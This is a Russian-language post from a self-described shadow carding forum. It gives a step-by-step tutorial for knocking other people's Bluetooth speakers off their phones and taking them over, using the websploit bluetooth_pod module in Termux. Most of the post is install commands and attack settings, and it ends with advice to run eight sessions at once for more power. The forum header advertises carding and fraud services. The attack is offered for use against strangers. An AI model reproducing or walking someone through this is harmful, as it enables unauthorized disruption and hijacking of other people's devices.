Привет, гость!

Добро пожаловать на CVVBOARD - крупнейший теневой кардинг форум. У нас Вы сможете найти огромное множество статей по теме кардинга и заработка в интернете. Актуальная информация, новости даркнета, сервисы от проверенных продавцов, эксклюзивные, только рабочие схемы заработка, ежедневные раздачи - все это Вы найдете на нашем форуме! Не пренебрегайте услугами Гарант-Сервиса это убережет Вас от мошенников. Обратите внимание, звание модератора не является гарантом в сделках!

Взламываем Bluetooth колонки

Download_Link

Участник клуба
Регистрация
7 Июл 2020
Сообщения
404
Реакции
58
Депозит
200$
Салют, бандиты! Думаю многих бесят школьники с колонками на которых играет ужасная музыка. И я думаю каждый бы хотел заглушить этот кошмар. В этом посте вы научитесь разрывать Bluetooth-соединение между колонкой и телефоном, и даже подключится к ней и включить свою музыку.

Установка

$ pkg update
$ pkg install python$ pkg install git$ pkg install python2$ pip2 install scapy$ git clone https://github.com/The404Hacking/websploit$ cd websploit$ chmod 777 * websploit.py


Запуск


$ python2 websploit.py


У нас открывается утилита. Далее пишем следующее:


$ use bluetooth/bluetooth_pod


Затем переходим по ссылке и скачиваем "nRF Connect" — тык (https://play.google.com/store/apps/details?id=no.nordicsemi.android.mcp&hl=ru&gl=US). Устанавливаем и открываем, после чего даём нужные разрешения. Нажимаем «СКАНИРОВАТЬ», ищем колонку, и копируем её mac-адрес.

Возвращаемся в Termux и пишем следующее:

$ set size 999
$ set bdaddr mac-адрес
$ run
Вместо "mac-адрес" вставляем скопированный mac-адрес.Далее, как только колонка перестанет воспроизводить звук, то это значит, что мы разорвали соединение, поэтому сразу же пробуем подключится через "nRF Connect" к колонке.

Так же стоит уточнить, что если расстояние до колонки слишком большое, то ничего не выйдет. Таким способом можно разрывать соединение не только bluetooth-колонки, но и любых других девайсов с "синим зубом".

Для большей мощности, советую создать целых 8 сессий и во всех запустить атаку
 

I_LOVE_18+

Участник клуба
Регистрация
7 Июл 2020
Сообщения
1,263
Реакции
14
как установить? через консоль
 
Сверху Снизу